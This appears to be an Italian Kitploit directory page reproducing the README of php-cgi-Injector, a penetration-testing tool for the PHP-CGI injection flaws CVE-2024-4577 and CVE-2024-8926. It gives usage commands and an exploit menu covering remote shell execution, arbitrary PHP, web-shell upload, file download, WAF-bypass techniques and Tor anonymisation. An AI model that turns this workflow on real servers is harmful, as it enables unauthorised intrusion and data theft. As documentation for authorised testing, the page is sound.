Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
php-cgi-Injector — Uno strumento di penetration testing per testare le CVE-2024-4577 e CVE-2024-8926. | Kitploit
Strumenti/GitHubGitHub/night-have-dreams/php-cgi-injector
Scanner di VulnerabilitàGenerazione di PayloadExploitSfruttamento di Applicazioni WebBypass WAFPenetration TestingCommand and Control
GitHubnight-have-dreams/php-cgi-injector

php-cgi-Injector

Uno strumento di penetration testing per testare le CVE-2024-4577 e CVE-2024-8926.

Vedi Repository
4921 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

PHP-CGI Injector

🚀 Strumento Exploit per CVE-2024-4577 e CVE-2024-8926

Strumento di test automatizzato per la vulnerabilità di iniezione dei parametri PHP-CGI, supporta CVE-2024-4577 e CVE-2024-8926, consentendo esecuzione di comandi, upload e download di file e altro.


📌 Introduzione

Questo strumento può essere utilizzato per testare la vulnerabilità di iniezione dei parametri negli ambienti PHP-CGI e offre:

  • ✅ Interfaccia terminale accattivante con effetti animati
  • ✅ Scansione automatizzata delle vulnerabilità
  • ✅ Molteplici modalità di attacco (Shell, esecuzione di codice PHP, upload/download di file)
  • ✅ Combinazioni di Payload predefinite e personalizzate
  • ✅ Modalità di anonimizzazione del traffico via Tor
  • ✅ Molteplici moduli di bypass WAF
  • ✅ Supporto per la conversione automatica della codifica dell'output
  • ✅ Modalità di sfruttamento forzato (attivabile anche senza scansione della vulnerabilità)
  • ❌ Non prepara il caffè, ma è in grado di "cuocere" il WAF.
  • ❌ Non scrive report, non ti aiuta a fidanzarti né a superare l'esame di ammissione.
  • ❌ Non supporta l'ingegneria sociale: gestisci da solo gli esseri umani.

📜 Dichiarazione di esclusione di responsabilità

Questo strumento è destinato esclusivamente a test legittimi e scopi accademici. Non utilizzarlo su sistemi non autorizzati!

⚠️ L'uso illegale comporta responsabilità legali!

Questo strumento è destinato esclusivamente a:

  • 🔹 Test di penetrazione Red Team aziendali
  • 🔹 Ricerca sulla sicurezza CTF
  • 🔹 Apprendimento personale della sicurezza
  • 🔹 Altri test di sicurezza autorizzati

📥 Installazione delle dipendenze

Questo strumento dipende dai seguenti pacchetti Python. Installarli prima:

root@kitploit:~
pip install -r requirements.txt

Oppure installazione manuale:

root@kitploit:~
pip install requests requests-tor chardet urllib3 rich

🛠️ Utilizzo

📌 Utilizzo di base

root@kitploit:~
python exploit.py -u URL [--timeout sec] [--delay sec] [--log] [--verbose] [--payload PAYLOAD] [--bypass] [--tor] [--no-effects] [--force] [--cgipoint PATHS...]

Esempio:

root@kitploit:~
python exploit.py -u http://example.com --timeout 30 --payload 2 --log --tor --verbose
python exploit.py -u http://example.com --bypass --force
python exploit.py -u http://example.com --cgipoint /php-cgi/php-cgi.exe /cgi-bin/php

📌 Opzioni dei parametri


📌 Modalità operative

Quando lo script trova una vulnerabilità, mostra il menu:

root@kitploit:~
╭────────────  Menu modalità Exploit  ────────────╮
│ Destinazione attuale:http://example.com/              │
│ Punto di iniezione attuale:/php-cgi/php-cgi.exe           │
│ ID vulnerabilità:CVE-2024-4577                    │
╰────────────────────────────────────────────╯
1) 🧪 Modalità Shell
2) 🛠️ Modalità codice PHP personalizzato
3) 📤 Carica file
4) 📥 Scarica file
5) 🎯 Cambia destinazione dell'attacco
6) ⚙️ Impostazioni parametri
7) ❌ Esci dal programma
>>

📌 Dettaglio delle modalità

1️⃣ Modalità Shell

Esegue comandi di sistema:

root@kitploit:~
shell> whoami

📂 Salvataggio dell'output

root@kitploit:~
shell> whoami --save
root@kitploit:~
shell> whoami --save C:\output\whoami.txt

2️⃣ Modalità PHP personalizzata

Esegue codice PHP personalizzato:

root@kitploit:~
phpinfo();
EOF

📂 Salvataggio dell'output

root@kitploit:~
phpinfo();
EOF --save
root@kitploit:~
phpinfo();
EOF --save C:\output\info.html

3️⃣ Carica file

root@kitploit:~
Percorso del file locale:C:\test\shell.php
Percorso completo di destinazione:
[*] Percorso di upload impostato automaticamente su: C:/xampp/htdocs/shell.php

📂 Specifica manuale del percorso

root@kitploit:~
Percorso completo di destinazione:C:\xampp\php\shell.php

4️⃣ Scarica file

root@kitploit:~
Percorso del file remoto:C:\xampp\htdocs\index.php

📂 Dopo il download, i file vengono salvati in download/; in caso di duplicati, viene aggiunto automaticamente un numero

root@kitploit:~
[*] Download del file completato, salvato in download/index.php

5️⃣ Cambia destinazione dell'attacco

root@kitploit:~
Inserisci il nuovo URL di destinazione: http://newtarget.com

🔹 La vulnerabilità verrà nuovamente testata


6️⃣ Impostazioni parametri

root@kitploit:~
[⚙️ Menu impostazioni parametri della fase di sfruttamento]

1) Cambia Payload        1
2) Modulo Bypass         Non selezionato
3) Timeout        10 secondi
4) Ritardo richieste Delay          0 secondi
5) Registrazione Log            Disattivata
6) Modalità dettagliata Verbose        Disattivata
7) Effetti animazione Effects        Attivi
8) Sfruttamento forzato Force          Disattivato
9) Salva e torna al menu Exploit

📌 Moduli di bypass WAF

Sono disponibili le seguenti strategie di bypass:

  • Deformazione del percorso CGI
  • Aggiunta di caratteri non validi prima e dopo il Payload
  • Sostituzione di php://input con altre formulazioni
  • Aggiunta di header HTTP specifici o casuali
  • Offuscamento del contenuto POST
  • Rimescolamento casuale dell'ordine del Payload
  • Script di bypass personalizzati: consultare tamper_example_template.txt per il formato

Scarica lo strumento
ParametroDescrizioneEsempio
-u 、 --urlSpecifica l'URL di destinazione-u http://example.com
--timeout secImposta il timeout della richiesta (0 = illimitato)--timeout 30
--logRegistra automaticamente i comandi shell--log
--payloadSpecifica o personalizza la combinazione di Payload--payload 2
--torInvia le richieste tramite Tor--tor
--verboseMostra messaggi dettagliati--verbose
--bypassAbilita la modalità di bypass WAF--bypass
--forceForza la modalità di sfruttamento--force
--cgipoint PATHSSpecifica percorsi CGI particolari da testare--cgipoint /path
--delay secSecondi di attesa tra una richiesta e l'altra--delay 1.5
--no-effectsDisattiva tutte le animazioni e gli effetti di ritardo--no-effects